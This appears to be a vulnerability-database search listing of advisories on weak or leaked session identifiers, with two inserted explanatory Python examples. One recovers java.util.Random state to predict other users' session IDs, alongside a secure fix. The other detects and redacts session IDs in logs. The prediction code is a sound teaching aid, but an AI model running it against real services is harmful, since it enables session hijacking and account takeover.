
433 matches found

ATTACKERKB
added 2023/12/21 11:15 a.m.

CVE-2023-50473

Cross-Site Scripting (XSS) vulnerability in bill-ahmed qbit-matUI version 1.16.4 allows remote attackers to obtain sensitive information via fixed session identifiers (SID) in the index.js file...

CVSS 5.4 · AI score 6.1 · EPSS 0.00387
Exploits 0 · References 3
NVD
added 2023/12/21 11:15 a.m.

CVE-2023-50473

Cross-Site Scripting (XSS) vulnerability in bill-ahmed qbit-matUI version 1.16.4 allows remote attackers to obtain sensitive information via fixed session identifiers (SID) in the index.js file...

CVSS 5.4 · EPSS 0.00387
Exploits 0 · References 2
OSV
added 2023/12/21 11:15 a.m.

CVE-2023-50473

Cross-Site Scripting (XSS) vulnerability in bill-ahmed qbit-matUI version 1.16.4 allows remote attackers to obtain sensitive information via fixed session identifiers (SID) in the index.js file...

CVSS 5.4 · AI score 5.6 · EPSS 0.00387
Exploits 0 · References 2
Prion
added 2023/12/21 11:15 a.m.

Cross site scripting

Cross-Site Scripting (XSS) vulnerability in bill-ahmed qbit-matUI version 1.16.4 allows remote attackers to obtain sensitive information via fixed session identifiers (SID) in the index.js file...

CVSS 4.9 · AI score 5.8 · EPSS 0.00387
Exploits 0 · References 2 · Affected Software 1
Cvelist
added 2023/12/21 12:00 a.m.

CVE-2023-50473

Cross-Site Scripting (XSS) vulnerability in bill-ahmed qbit-matUI version 1.16.4 allows remote attackers to obtain sensitive information via fixed session identifiers (SID) in the index.js file...

AI score 5.5 · EPSS 0.00387
Exploits 0 · References 2
ATTACKERKB
added 2023/11/30 11:15 p.m.

CVE-2023-46326

ZStack Cloud version 3.10.38 and before allows unauthenticated API access to the list of active job UUIDs and the session ID for each of these. This leads to privilege escalation...

CVSS 8.8 · AI score 5.7 · EPSS 0.00726
Exploits 1 · References 2
CNNVD
added 2023/11/30 12:00 a.m.

ZStack Security Vulnerabilities

ZStack is open-source IaaS (Infrastructure as a Service) software designed to automate data centers and manage compute, storage, and network resources through APIs. A security vulnerability exists in ZStack Cloud 3.10.38 and earlier versions that stems from allowing unauthenticated API access to...

CVSS 8.8 · AI score 6.8 · EPSS 0.00726
Exploits 1 · References 1
OSV
added 2023/11/23 3:15 p.m.

CVE-2023-4677

Cron log backup files contain administrator session IDs. It is trivial for any attacker who can reach the Pandora FMS Console to scrape the cron logs directory for cron log backups. The contents of these log files can then be abused to authenticate to the application as an administrator. This iss...

CVSS 9.8 · AI score 5.8 · EPSS 0.00493
Exploits 0 · References 1
Positive Technologies
added 2023/11/21 12:00 a.m.

PT-2023-8542 · Unknown · Pandora Fms

Name of the Vulnerable Software and Affected Versions: Pandora FMS versions = 772 Description: The issue is related to insufficient protection of registration data in the Pandora FMS Console, allowing an attacker to gain unauthorized access to protected information and elevate their privileges to...

CVSS 10 · AI score 9.4 · EPSS 0.00493
Exploits 0 · References 7
Positive Technologies
added 2023/06/29 12:00 a.m.

PT-2023-24974 · Xiamen Si Xin Communication Technology · Video Management System

Name of the Vulnerable Software and Affected Versions: Xiamen Si Xin Communication Technology Video management system versions 3.1 through 4.1 Description: An issue was discovered with the JSESSION IDs in the system, allowing attackers to gain escalated privileges. Recommendations: For versions 3...

CVSS 8.8 · AI score 7.1 · EPSS 0.00615
Exploits 1 · References 3
CNNVD
added 2023/06/12 12:00 a.m.

Atlas Copco Power Focus security feature issue vulnerability

Atlas Copco Power Focus is a universal tightening system from Atlas Copco Sweden that connects to a wide range of Atlas Copco assembly tools to provide you with a full platform assembly solution. A security vulnerability exists in the Atlas Copco Power Focus 6000 that stems from the server using ...

CVSS 9.4 · AI score 7.4 · EPSS 0.00559
Exploits 0 · References 2
CNNVD
added 2023/04/21 12:00 a.m.

tss-lib security vulnerability

tss-lib is an open source IO FinNet implementation of the multi-party {t,n}-threshold ECDSA (Elliptic Curve Digital Signature Algorithm) based on Gennaro and Goldfeder 2020 [1] and EdDSA (Edwards-curve Digital Signature Algorithm). A security vulnerability exists in IO FinNet tss-lib versions prior to...

CVSS 6.8 · AI score 6.6 · EPSS 0.00523
Exploits 0 · References 3
SUSE CVE
added 2023/04/20 2:27 a.m.

SUSE CVE-2006-6969

Jetty before 4.2.27, 5.1 before 5.1.12, 6.0 before 6.0.2, and 6.1 before 6.1.0pre3 generates predictable session identifiers using java.util.Random, which makes it easier for remote attackers to guess a session identifier through brute force attacks, bypass authentication requirements, and possib...

CVSS 6.8 · AI score 7.4 · EPSS 0.01561
Exploits 0 · References 3
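The Jetty entry above describes the classic failure: session identifiers drawn from java.util.Random, a 48-bit linear congruential generator whose every 32-bit output exposes 32 of the 48 state bits. The Python below is an added example, not Jetty's code or anything from the advisory. It assumes a hypothetical server that issues one hex-encoded nextInt() per session (weak_session_ids), re-implements the JDK generator from its published constants, recovers the 16 hidden bits from a few IDs the attacker obtained for its own sessions, and predicts the IDs that later sessions will receive. strong_session_id shows the fix: a CSPRNG, the equivalent of java.security.SecureRandom.

```python
import secrets
from typing import List, Optional

# Constants of java.util.Random's 48-bit linear congruential generator (from the JDK specification).
LCG_MULT = 0x5DEECE66D
LCG_ADD = 0xB
LCG_MASK = (1 << 48) - 1


class JavaUtilRandom:
    """Minimal re-implementation of java.util.Random, enough to reproduce nextInt()."""

    def __init__(self, seed: int) -> None:
        # The JDK scrambles the seed by XOR with the multiplier before use.
        self.state = (seed ^ LCG_MULT) & LCG_MASK

    @classmethod
    def from_state(cls, state: int) -> "JavaUtilRandom":
        """Build a generator positioned at a known internal state (used after recovery)."""
        rng = cls(0)
        rng.state = state & LCG_MASK
        return rng

    def next_u32(self) -> int:
        """One LCG step; returns the top 32 bits of the new state (nextInt() viewed as unsigned)."""
        self.state = (self.state * LCG_MULT + LCG_ADD) & LCG_MASK
        return self.state >> 16


def weak_session_ids(seed: int, count: int) -> List[str]:
    """Hypothetical weak server: one java.util.Random nextInt() per session, hex-encoded."""
    rng = JavaUtilRandom(seed)
    return [f"{rng.next_u32():08x}" for _ in range(count)]


def recover_state(observed: List[str]) -> Optional[int]:
    """Recover the generator state from consecutive IDs the attacker obtained for itself.

    Every ID reveals the top 32 bits of the 48-bit state, so only the 16 hidden low
    bits are unknown: 65,536 candidates, each checked against the IDs that followed.
    """
    if len(observed) < 2 or any(len(s) != 8 for s in observed):
        return None
    values = [int(s, 16) for s in observed]
    for low in range(1 << 16):
        candidate = JavaUtilRandom.from_state((values[0] << 16) | low)
        if all(candidate.next_u32() == v for v in values[1:]):
            return candidate.state  # state after the last observed ID
    return None


def predict_next_ids(observed: List[str], count: int) -> Optional[List[str]]:
    """Predict the IDs the server will issue to the next `count` sessions (other users')."""
    state = recover_state(observed)
    if state is None:
        return None
    rng = JavaUtilRandom.from_state(state)
    return [f"{rng.next_u32():08x}" for _ in range(count)]


def strong_session_id() -> str:
    """The fix: 128 bits from the OS CSPRNG (what java.security.SecureRandom would give)."""
    return secrets.token_hex(16)


if __name__ == "__main__":
    ids = weak_session_ids(2023, 6)
    print("attacker's own sessions:", ids[:3])
    print("predicted next IDs:     ", predict_next_ids(ids[:3], 3))
    print("actual next IDs:        ", ids[3:])
    print("unpredictable ID:       ", strong_session_id())
```

Two consecutive IDs already determine the state; the third only rules out a spurious candidate. The lesson for reviews is that session-ID checks must look at the generator, not the format: a 32-bit ID is brute-forceable online whatever produced it, and a long ID assembled from a weak generator is no better than a short one.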
CNNVD
added 2023/04/13 12:00 a.m.

Spring Session security vulnerability

Spring Session is a module from Spring. A security vulnerability exists in Spring Session version 3.0.0, which stems from the recording of session IDs into the standard output stream leading to the disclosure of sensitive information...

CVSS 6.5 · AI score 6.4 · EPSS 0.0066
Exploits 0 · References 2
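The Spring Session entry above and the Pandora FMS cron-log entry earlier describe the same leak: a valid session ID written to stdout or a log file, from where anyone who can read it can replay the session. The Python below is an added example, not code from either project. It assumes a list of common session cookie names (SESSION_NAMES, extend it for your stack) and uses constructed sample log lines; it finds session identifiers in log text and redacts their values, keeping the cookie name so the log stays useful for debugging.

```python
import re
from typing import List, Tuple

# Constructed sample log lines for this example; not taken from any product listed above.
SAMPLE_LOG = """\
2023-04-13 10:01:02 INFO  Created session JSESSIONID=7F1C3A9E2B44D5E6F7A8B9C0D1E2F3A4 for user alice
2023-04-13 10:01:03 DEBUG Request headers: Cookie: PHPSESSID=f3a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5; theme=dark
2023-04-13 10:01:04 INFO  Backup of cron log completed
2023-04-13 10:01:05 DEBUG Set-Cookie: sid=abcdef0123456789; Path=/; HttpOnly
"""

# Cookie/parameter names commonly used for session identifiers (assumed list; extend for your stack).
SESSION_NAMES = ("JSESSIONID", "PHPSESSID", "ASP.NET_SessionId", "SESSIONID", "SESSION_ID", "SID")

# name=value where the value is at least 8 token characters; the match stops at ';', whitespace or quotes.
# \b keeps "SID" from matching inside "JSESSIONID" or "PHPSESSID".
SESSION_RE = re.compile(
    r"\b(" + "|".join(re.escape(n) for n in SESSION_NAMES) + r")=([A-Za-z0-9._\-]{8,})",
    re.IGNORECASE,
)


def find_session_ids(text: str) -> List[Tuple[str, str]]:
    """Return (name, value) pairs for every session identifier found in the text."""
    return [(m.group(1), m.group(2)) for m in SESSION_RE.finditer(text)]


def redact_session_ids(text: str) -> str:
    """Replace each session identifier value with a fixed marker; the name is kept."""
    return SESSION_RE.sub(lambda m: f"{m.group(1)}=[REDACTED]", text)


if __name__ == "__main__":
    for name, value in find_session_ids(SAMPLE_LOG):
        print(f"leaked {name} ({len(value)} chars)")
    print(redact_session_ids(SAMPLE_LOG))
```

Run the redaction at the log sink (a logging filter or the shipper), not on the files after the fact: the Pandora FMS case shows that once backups of a log exist, a scrub of the live file changes nothing. A detection rule over stored logs can use find_session_ids as-is to flag the services that are leaking.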
CNNVD
added 2023/04/12 12:00 a.m.

Securepoint Unified Threat Management security vulnerability

Securepoint Unified Threat Management (Securepoint UTM) is a unified threat management product from Securepoint, Germany. A security vulnerability exists in Securepoint Unified Threat Management versions prior to 12.2.5.1, which stems from the presence of an information leak. An attacker can exploit the...

CVSS 6.5 · AI score 7.1 · EPSS 0.04074
Exploits 4 · References 7
BDU FSTEC
added 2023/04/04 12:00 a.m.

The vulnerability of software and hardware components in SCADA systems, such as ABB Pulsar Plus System Controller NE843_S, Infinity DC Power Plant H5692448 G104, Infinity DC Power Plant H5692448 G842, Infinity DC Power Plant H5692448 G224L, Infinity DC Power Plant H5692448 G630-4, Infinity DC Power Plant H5692448 G451C(2), Infinity DC Power Plant H5692448 G461(2), arises due to the use of insufficiently random values. This vulnerability allows unauthorized individuals to gain unauthorized access to session identifiers.

The vulnerabilities of the software and hardware components of SCADA systems, such as ABB Pulsar Plus System Controller NE843S, Infinity DC Power Plant H5692448 G104, Infinity DC Power Plant H5692448 G842, Infinity DC Power Plant H5692448 G224L, Infinity DC Power Plant H5692448 G630-4, Infinity D...

CVSS 7.5 · AI score 5.6 · EPSS 0.00427
Exploits 0 · References 3 · Affected Software 7
Positive Technologies
added 2023/03/31 12:00 a.m.

PT-2023-22013 · Unknown · Lemonldap::Ng

Name of the Vulnerable Software and Affected Versions: LemonLDAP::NG versions prior to 2.16.1 Description: An issue was discovered in LemonLDAP::NG that allows attackers to bypass 2FA verification due to weak session ID generation in the AuthBasic handler and incorrect failure handling during a...

CVSS 9.8 · AI score 9.4 · EPSS 0.00957
Exploits 1 · References 19
Prion
added 2023/03/25 5:15 p.m.

CVE-2023-1632

DISPUTED A vulnerability has been found in Ellucian Banner Web Tailor 8.6 and classified as critical. This vulnerability affects unknown code of the file /PRODar/twbkwbis.PFirstMenu of the component Login Page. The manipulation of the argument PIDM/WEBID leads to improper authorization. The attac...

CVSS 6.5 · AI score 7.5
Exploits 0 · References 2 · Affected Software 1
RedHat Linux
added 2023/03/01 9:45 p.m.

keycloak: Session takeover with OIDC offline refreshtokens

A flaw was found in the offline_access scope in Keycloak. This issue affects users of shared computers, especially if cookies are not cleared, due to a lack of root session validation and the reuse of session IDs across root and user authentication sessions. This enables an attacker to...

CVSS 6.8 · AI score 6.3 · EPSS 0.00952
Exploits 0 · References 4
SUSE CVE
added 2023/02/15 6:12 a.m.

SUSE CVE-2007-1522

Double free vulnerability in the session extension in PHP 5.2.0 and 5.2.1 allows context-dependent attackers to execute arbitrary code via illegal characters in a session identifier, which is rejected by an internal session storage module, which calls the session identifier generator with an...

CVSS 6.8 · AI score 8.7 · EPSS 0.06612
Exploits 1 · References 4